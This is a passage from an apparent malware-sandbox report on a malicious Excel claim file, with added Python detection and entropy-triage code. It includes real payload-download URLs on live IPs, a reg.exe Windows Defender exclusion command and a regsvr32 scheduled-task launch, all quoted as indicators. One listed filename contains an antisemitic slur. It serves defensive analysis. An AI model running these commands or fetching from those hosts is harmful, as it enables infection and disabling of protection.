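    r"C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\reg.exe ADD"
    r" 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD"
    r" /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0'",
    r"C:\Windows\System32\taskeng.exe | regsvr32.exe -s 'C:\Users\user\Fiosa.der'",
    r"C:\Windows\explorer.exe | C:\Windows\System32\notepad.exe",  # constructed benign control
]


@dataclass
class Finding:
    rule: str
    parent: str
    cmdline: str


def basename(path: str) -> str:
    return path.strip("'\"").replace("/", "\\").rsplit("\\", 1)[-1].lower()


def child_image(cmdline: str) -> str:
    """Image name from the first command-line token (quoted or bare)."""
    m = re.match(r"""\s*(?:'([^']+)'|"([^"]+)"|(\S+))""", cmdline)
    token = next(g for g in m.groups() if g is not None)
    name = basename(token)
    return name if name.endswith(".exe") else name + ".exe"


def non_dll_targets(cmdline: str, image: str) -> list:
    """Path-like arguments whose extension is not one regsvr32 normally loads."""
    paths = re.findall(r"""[^\s'"]+\.[A-Za-z0-9]{1,4}""", cmdline)
    return [p for p in paths
            if basename(p) != image
            and p.rsplit(".", 1)[-1].lower() not in DLL_EXTENSIONS]


def analyze(events):
    findings = []
    for event in events:
        parent, cmdline = (s.strip() for s in event.split("|", 1))
        pimg, cimg, low = basename(parent), child_image(cmdline), cmdline.lower()
        hits = []
        if pimg in OFFICE_APPS and cimg in LOLBINS:
            hits.append("office_spawns_lolbin")
        if cimg == "regsvr32.exe" and non_dll_targets(cmdline, cimg):
            hits.append("regsvr32_non_dll_target")
        if cimg == "explorer.exe" and pimg not in EXPLORER_PARENTS:
            hits.append("explorer_from_unexpected_parent")
        if (cimg == "schtasks.exe" and "/create" in low
                and re.search(r"/ru\s+'?(?:nt authority\\)?system", low)
                and any(b in low for b in LOLBINS) and "\\users\\" in low):
            hits.append("system_task_runs_lolbin_from_user_profile")
        if cimg == "reg.exe" and " add " in low and "windows defender\\exclusions" in low:
            hits.append("defender_exclusion_via_reg")
        findings.extend(Finding(rule, pimg, cmdline) for rule in hits)
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"{f.rule:42} {f.parent} -> {f.cmdline[:70]}")
```

On a live host the same artifacts can be read back with Get-MpPreference (the ExclusionPath property) and schtasks /Query /TN mmvyheu /V; in telemetry, parent/child pairs and command lines are enough for every rule here, no file content needed.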
Source: explorer.exe, 00000049.00000002.1501622473.0000000000CE0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000049.00000002.1501622473.0000000000CE0000.00000002.00020000.sdmp | Binary or memory string: !Progman
Source: explorer.exe, 00000049.00000002.1501622473.0000000000CE0000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\taskeng.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 73_2_000C31C2 CreateNamedPipeA,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,

    Mitre Att&ck Matrix

    Columns are tactics; each entry is one cell of the report's matrix, listed top to bottom. A trailing number is the count badge rendered in that cell (digits reproduced as extracted); entries without one are the column's default fill.

    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
    Execution: Command and Scripting Interpreter 11; Scheduled Task/Job 1; Scripting 2; Native API 1; Exploitation for Client Execution 32; Launchd; Scheduled Task; Command and Scripting Interpreter
    Persistence: Scheduled Task/Job 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
    Privilege Escalation: Process Injection 413; Scheduled Task/Job 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
    Defense Evasion: Masquerading 121; Disable or Modify Tools 1; Modify Registry 1; Virtualization/Sandbox Evasion 1; Process Injection 413; Scripting 2; Obfuscated Files or Information 11; Software Packing 1
    Credential Access: Credential API Hooking 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
    Discovery: System Time Discovery 1; Security Software Discovery 2; Virtualization/Sandbox Evasion 1; Process Discovery 3; File and Directory Discovery 2; System Information Discovery 16; Network Sniffing; Network Service Scanning
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
    Collection: Credential API Hooking 1; Archive Collected Data 1; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
    Command and Control: Encrypted Channel 1; Ingress Tool Transfer 12; Non-Application Layer Protocol 1; Application Layer Protocol 21; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
    Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

    Behavior Graph

    Behavior Graph ID: 489852 | Sample: Claim-1763045001-09242021.xls | Start date: 24/09/2021 | Architecture: WINDOWS | Score: 100

    Process tree as drawn in the graph. Node numbers are the graph's own; the figures after "badges" are the graph's created-file / registry-value counters as extracted; signatures, network destinations and dropped files are listed under the process they are attributed to.

    • Claim-1763045001-09242021.xls (node 2)
      Signatures: Document exploit detected (drops PE files); Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); Sigma detected: Schedule system process; 6 other signatures
      • EXCEL.EXE (node 9; badges 191 39)
        Network: 111.90.148.104 port 80 from local port 49166 (SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY, Malaysia); 190.14.37.173 port 80 from local port 49165 (OffshoreRacksSAPA, Panama); 51.89.115.111 port 80 from local port 49168 (OVHFR, France)
        Dropped: C:\Users\user\Fiosa1.der (PE32); C:\Users\user\...\44463.6863100694[2].dat (PE32); C:\Users\user\...\44463.6863100694[1].dat (PE32)
        Signature: Document exploit detected (UrlDownloadToFile)
        • regsvr32.exe (node 16)
          • regsvr32.exe (node 26)
            Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions
            • explorer.exe (node 37; badges 8 1)
              Signatures: Uses cmd line tools excessively to alter registry or file data; Drops PE files to the user root directory; Uses schtasks.exe or at.exe to add and modify task schedules
              • schtasks.exe (node 45)
        • regsvr32.exe (node 18)
          • regsvr32.exe (node 29)
            • explorer.exe (node 40)
              Dropped: C:\Users\user\Fiosa2.der (PE32)
        • regsvr32.exe (node 20)
          • regsvr32.exe (node 31)
      • taskeng.exe (node 14; badge 1)
        • regsvr32.exe (node 22)
          • regsvr32.exe (node 33)
            Signatures: Allocates memory in foreign processes; Maps a DLL or memory area into another process
            • explorer.exe (node 43; badges 8 1)
              Dropped: C:\Users\user\Fiosa.der (PE32)
              • reg.exe (node 47; badge 1)
              • reg.exe (node 49; badge 1)
        • regsvr32.exe (node 24)
          • regsvr32.exe (node 35)


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner
    Claim-1763045001-09242021.xls | 0% | Virustotal

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://www.%s.comPA | 0% | URL Reputation | safe
    http://51.89.115.111/44463.6863100694.dat | 0% | Avira URL Cloud | safe
    http://190.14.37.173/44463.6863100694.dat | 0% | Avira URL Cloud | safe
    http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
    http://111.90.148.104/44463.6863100694.dat | 0% | Avira URL Cloud | safe

    The three 44463.6863100694.dat URLs are the payload downloads EXCEL.EXE actually performed (see Contacted URLs below). A 0% / "safe" verdict from URL reputation at analysis time only means the hosts were not yet listed and is not evidence of benign content. http://www.%s.comPA contains a printf-style %s placeholder and http://servername/isapibackend.dll a literal placeholder hostname; both are format strings found in module memory, not destinations the sample contacted.

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://51.89.115.111/44463.6863100694.dat | false | Avira URL Cloud: safe | unknown
    http://190.14.37.173/44463.6863100694.dat | false | Avira URL Cloud: safe | unknown
    http://111.90.148.104/44463.6863100694.dat | false | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source (memory dumps) | Malicious | Antivirus Detection | Reputation
    http://www.%s.comPA | regsvr32.exe (00000037.00000002.1177895087.0000000002380000.00000002.00020000.sdmp); explorer.exe (00000049.00000002.1501665453.00000000020E0000.00000002.00020000.sdmp); regsvr32.exe (0000004E.00000002.1182716509.0000000002080000.00000002.00020000.sdmp); taskeng.exe (00000051.00000002.1501516391.00000000007D0000.00000002.00020000.sdmp) | false | URL Reputation: safe | low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | the same four memory dumps as the entry above | false | (none) | high
    http://servername/isapibackend.dll | regsvr32.exe (00000036.00000002.1180236690.0000000001DE0000.00000002.00020000.sdmp); regsvr32.exe (00000037.00000002.1177193034.0000000000A10000.00000002.00020000.sdmp); regsvr32.exe (0000004C.00000002.1185707196.0000000001D90000.00000002.00020000.sdmp); regsvr32.exe (0000004E.00000002.1181817022.0000000001D80000.00000002.00020000.sdmp); regsvr32.exe (00000052.00000002.1248992914.0000000000980000.00000002.00020000.sdmp) | false | Avira URL Cloud: safe | low

    None of these three is a contacted URL: %s is a format placeholder, servername is a placeholder hostname, and the WS-Addressing URI is a protocol constant. They are strings carried by modules mapped into the processes, which is why the same string turns up in the dumps of regsvr32.exe, explorer.exe and taskeng.exe alike; they should not be added to an indicator list.

      Contacted IPs


      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      190.14.37.173 | unknown | Panama | 52469 | OffshoreRacksSAPA | false
      51.89.115.111 | unknown | France | 16276 | OVHFR | false
      111.90.148.104 | unknown | Malaysia | 45839 | SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | false

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:489852
      Start date:24.09.2021
      Start time:16:27:21
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 18m 0s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:Claim-1763045001-09242021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of new started processes analysed:104
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@34/9@0/3
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 24% (good quality ratio 22.7%)
      • Quality average: 77.2%
      • Quality standard deviation: 27%
      HCA Information:
      • Successful, ratio: 87%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, mscorsvw.exe, svchost.exe
      • TCP Packets have been reduced to 100
      • Excluded IPs from analysis (whitelisted): 209.197.3.8, 173.222.108.226, 173.222.108.210
      • Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
      • Not all processes were analyzed; the report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      Time | Type | Description
      16:34:17 | API Interceptor | 41x Sleep call for process regsvr32.exe modified
      16:34:18 | API Interceptor | 907x Sleep call for process explorer.exe modified
      16:34:20 | API Interceptor | 2x Sleep call for process schtasks.exe modified
      16:34:21 | Task Scheduler | Run new task: mmvyheu, path: regsvr32.exe, arguments: -s "C:\Users\user\Fiosa.der"
      16:34:21 | API Interceptor | 372x Sleep call for process taskeng.exe modified

      Joe Sandbox View / Context

      IPs

      Match | Associated Sample Name / URL | Detection | Context
      190.14.37.173 | Claim-680517779-09242021.xls | malicious | 190.14.37.173/44463.6668827546.dat
      51.89.115.111 | Claim-680517779-09242021.xls | malicious | 51.89.115.111/44463.6668827546.dat
      111.90.148.104 | Claim-680517779-09242021.xls | malicious | 111.90.148.104/44463.6668827546.dat

      The sibling sample, submitted the same day with the same Claim-<digits>-09242021.xls naming, fetched the same path shape from the same three hosts with a different numeric suffix (44463.6668827546 versus 44463.6863100694 here). A hunt should therefore key on the hosts plus a path pattern of the form /44463.<digits>.dat rather than on the exact URL.

      Domains

      No context

      ASN

      Match (ASN) | Associated Sample Name / URL | Detection | Context (IP)

      OffshoreRacksSAPA:
      • Claim-680517779-09242021.xls | malicious | 190.14.37.173
      • Payment-687700136-09212021.xls | malicious | 190.14.37.232
      • Permission-851469163-06252021.xlsm | malicious | 190.14.37.3
      • Permission-851469163-06252021.xlsm | malicious | 190.14.37.3
      • Permission-830724601-06252021.xlsm | malicious | 190.14.37.3
      • Permission-830724601-06252021.xlsm | malicious | 190.14.37.3
      • Permission-40776837-06252021.xlsm | malicious | 190.14.37.3
      • Permission-40776837-06252021.xlsm | malicious | 190.14.37.3
      • Permission-1984690372-06252021.xlsm | malicious | 190.14.37.3
      • Permission-1532161794-06252021.xlsm | malicious | 190.14.37.3
      • Permission-1984690372-06252021.xlsm | malicious | 190.14.37.3
      • Permission-1532161794-06252021.xlsm | malicious | 190.14.37.3
      • Permission-414467145-06252021.xlsm | malicious | 190.14.37.3
      • Permission-414467145-06252021.xlsm | malicious | 190.14.37.3
      • 4cDyOofgzT.xlsm | malicious | 190.14.37.2
      • 4cDyOofgzT.xlsm | malicious | 190.14.37.2
      • 341288734918_06172021.xlsm | malicious | 190.14.37.2
      • 341288734918_06172021.xlsm | malicious | 190.14.37.2
      • Rebate_247668103_06142021.xlsm | malicious | 190.14.37.135
      • Rebate_247668103_06142021.xlsm | malicious | 190.14.37.135

      SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY:
      • Claim-680517779-09242021.xls | malicious | 111.90.148.104
      • b82IlqpqKM.exe | malicious | 111.90.146.200
      • AP.7.html | malicious | 111.90.141.112
      • z6eCorPozO.exe | malicious | 111.90.151.16
      • AP Remittance for bill.coleman@tetratech.com .html | malicious | 111.90.158.219
      • aia8XaelyQ.exe | malicious | 111.90.151.16
      • AP Remittance for tschlegelmilch@fmne.com .html | malicious | 111.90.158.219
      • Evopayments.mx--77Fax.HTML | malicious | 111.90.139.60
      • B68CWSIIIV.exe | malicious | 111.90.149.119
      • 46SGHijloy.exe | malicious | 101.99.94.158
      • Secured Fax_healthesystems.com.htm | malicious | 111.90.158.219
      • y1FOl1vVPA.exe | malicious | 101.99.77.132
      • K4.TA9.HTML | malicious | 111.90.139.60
      • MJ.TA9.HTML | malicious | 111.90.141.176
      • PM.TA9.HTML | malicious | 111.90.139.60
      • Ed0tQRwEq1.exe | malicious | 101.99.91.119
      • 2OhLduHQ9P.exe | malicious | 101.99.91.119
      • AP Remittance for robert.moelke@globalfoundries.com .html | malicious | 111.90.158.219
      • pbqkCjxPOF.exe | malicious | 111.90.146.149
      • CX.TA9.HTML | malicious | 111.90.139.60

      OVHFR:
      • Claim-680517779-09242021.xls | malicious | 51.89.115.111
      • proforma invoice_pdf_____________________________.exe | malicious | 51.195.17.68
      • NoO16S4omQ.exe | malicious | 87.98.185.184
      • 9jV2cBN6cQ.exe | malicious | 66.70.204.222
      • HSBC94302,pdf.exe | malicious | 51.254.53.102
      • ZamCfP5Dev.exe | malicious | 178.32.120.127
      • zuyrzhibfm.exe | malicious | 188.165.222.221
      • INV, BL, PL.exe | malicious | 94.23.48.114
      • b3astmode.x86 | malicious | 37.59.48.250
      • b3astmode.arm | malicious | 51.83.43.58
      • New Order.doc | malicious | 164.132.171.176
      • 2xgbTybbdX | malicious | 51.222.234.64
      • qri9CgHh4M | malicious | 51.222.234.64
      • eerjoaAQC2 | malicious | 51.222.234.64
      • fuckjewishpeople.mpsl | malicious | 51.222.234.64
      • fuckjewishpeople.mips | malicious | 51.222.234.64
      • fuckjewishpeople.arm7 | malicious | 51.222.234.64
      • fuckjewishpeople.x86 | malicious | 51.222.234.64
      • fuckjewishpeople.arm5 | malicious | 51.222.234.64
      • fuckjewishpeople.arm4 | malicious | 51.222.234.64

      JA3 Fingerprints

      No context

      Dropped Files

      Match | Associated Sample Name / URL | Detection
      C:\Users\user\Fiosa.der | Claim-680517779-09242021.xls | malicious
      C:\Users\user\Fiosa2.der | Claim-680517779-09242021.xls | malicious

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[1].dat
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):991232
          Entropy (8bit):6.443782963420258
          Encrypted:false
          SSDEEP:24576:RGWGYvyisJZdZ2wZ5fGWGYvyisJZdZ2wZ5:RG9YO7/fG9YO7/
          MD5:7EA14FAB1C9289C31A418F29A93FD66B
          SHA1:3CE15658DB90B8F5792126444E2FD6375DE1BF55
          SHA-256:9C82F24B311F775E83DD1007F22B5D281F1E9A767148147E194EF046E6467D05
          SHA-512:61BE1E4A08E38B92EF64216817E5DBB71FCF1B06F90C54B6B78BCE84B5337B67A44C664F1E8880841CF6ECDD497ECF6F1892D922D9938F909196123D533E430D
          Malicious:true
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[2].dat
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):97972
          Entropy (8bit):6.4820203315285045
          Encrypted:false
          SSDEEP:1536:Ch2iZdxbqIVTmfhPsWlX3JfllZyvhK9t56IjIHtUgRf//YLzD+ari29:Ch2SPbqzPtnbvDaf//YvD+l29
          MD5:344C7B31F7C31D4FA66933403EDFCC44
          SHA1:D3A146B93F63FDDE56FA77F40813CBB5E4B70B0C
          SHA-256:D6ECA3E2A2C23F7768851F6111A638B853E05B83C01593EE95AD135FBE84F741
          SHA-512:9DF062C0DEDE3B00627F319A3FA374E80E1136149CAC113DC5308C00A84F4DB8B8C875EC3AF68097735DF06177696521B4FA7829C04D5413AD6D58A9F5E17D07
          Malicious:true
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):162688
          Entropy (8bit):4.254394829588552
          Encrypted:false
          SSDEEP:1536:C6YL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CFJNSc83tKBAvQVCgOtmXmLpLm4l
          MD5:2FECEC53CC3C0FB6F6FFF7560D3F4857
          SHA1:47386F6165CA2FAE55C52D3CA378D25F32E915C2
          SHA-256:C5D7CCA00964B94678EE361504362103AD7B8098816ABA2D08C92CD5F9FA22AA
          SHA-512:0B652FD4D3D484B930517B2CC7B1EF35A71871A777DD04377D3CA8EFB4311EEA1BDBCD27528D4B1F46D0476086AFCA705226A9C516782AA7B1485962FB44488F
          Malicious:false
          Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
          C:\Users\user\Fiosa.der
          Process:C:\Windows\SysWOW64\explorer.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):495616
          Entropy (8bit):1.3741485480829125
          Encrypted:false
          SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
          MD5:15C440CEBA523F1FA008FAA03D09AC99
          SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
          SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
          SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
          Malicious:true
          Joe Sandbox View: also dropped by Claim-680517779-09242021.xls (Detection: malicious)
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\Fiosa1.der
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):97972
          Entropy (8bit):6.4820203315285045
          Encrypted:false
          SSDEEP:1536:Ch2iZdxbqIVTmfhPsWlX3JfllZyvhK9t56IjIHtUgRf//YLzD+ari29:Ch2SPbqzPtnbvDaf//YvD+l29
          MD5:344C7B31F7C31D4FA66933403EDFCC44
          SHA1:D3A146B93F63FDDE56FA77F40813CBB5E4B70B0C
          SHA-256:D6ECA3E2A2C23F7768851F6111A638B853E05B83C01593EE95AD135FBE84F741
          SHA-512:9DF062C0DEDE3B00627F319A3FA374E80E1136149CAC113DC5308C00A84F4DB8B8C875EC3AF68097735DF06177696521B4FA7829C04D5413AD6D58A9F5E17D07
          Malicious:true
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\Fiosa2.der
          Process:C:\Windows\SysWOW64\explorer.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):495616
          Entropy (8bit):1.3741485480829125
          Encrypted:false
          SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
          MD5:15C440CEBA523F1FA008FAA03D09AC99
          SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
          SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
          SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
          Malicious:true
          Joe Sandbox View: also dropped by Claim-680517779-09242021.xls (Detection: malicious)
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
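          Two things in the dropped-file records above are worth reading off the hashes and entropy values. Fiosa.der and Fiosa2.der are the same file (SHA-256 4F5DDF75..., 495616 bytes) and Fiosa1.der is byte-identical to 44463.6863100694[2].dat (SHA-256 D6ECA3E2..., 97972 bytes); all of them are PE32 DLLs carrying a .der extension, which mail and content filters associate with a certificate while regsvr32.exe, which loads its argument through LoadLibrary, does not care about the extension at all. The 495616-byte file has an 8-bit entropy of 1.37, whereas a normal x86 DLL such as the 97972-byte one sits at 6.48; a value that low over 484 KiB means a handful of byte values dominate the file, which is consistent with a binary inflated with padding rather than with packing or encryption. The following is an added example, not Joe Sandbox code, of the header, extension and entropy checks behind that reading. Its input is a constructed PE-shaped blob (MZ stub, PE signature at e_lfanew, zero padding), not one of the report's files, and the 3.0 bits/byte threshold and 64 KiB size floor are this example's own choices.

```python
"""Header/extension/entropy triage for dropped files (added example, not Joe Sandbox code).

The input is a constructed PE-shaped blob (MZ header, 'PE\\0\\0' at e_lfanew, zero padding);
it is not one of the report's files, and the thresholds are this example's own choices.
"""
import math
import os
import struct
from collections import Counter

PE_EXTS = {".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl", ".drv"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy: 0.0 for one repeated byte value, 8.0 for a uniform distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_pe(data: bytes) -> bool:
    """True if the data has an MZ stub and a 'PE\\0\\0' signature at the offset stored at 0x3C."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def triage(name: str, data: bytes, pad_threshold: float = 3.0) -> dict:
    """Flag a PE that hides behind a non-PE extension or is mostly padding."""
    ext = os.path.splitext(name)[1].lower()
    pe = is_pe(data)
    ent = shannon_entropy(data)
    return {
        "size": len(data),
        "is_pe": pe,
        "entropy": round(ent, 3),
        # A DLL named .der: extension filters see a certificate, regsvr32 sees a DLL.
        "extension_mismatch": pe and ext not in PE_EXTS,
        # Real x86 code and data sit around 6-7 bits/byte; a large PE well below that
        # is dominated by repeated bytes, i.e. inflated with padding.
        "padded": pe and ent < pad_threshold and len(data) >= 64 * 1024,
    }


def make_fake_pe(size: int, body: bytes = b"") -> bytes:
    """Constructed test input: minimal MZ/PE headers, an optional body, zero padding to `size`."""
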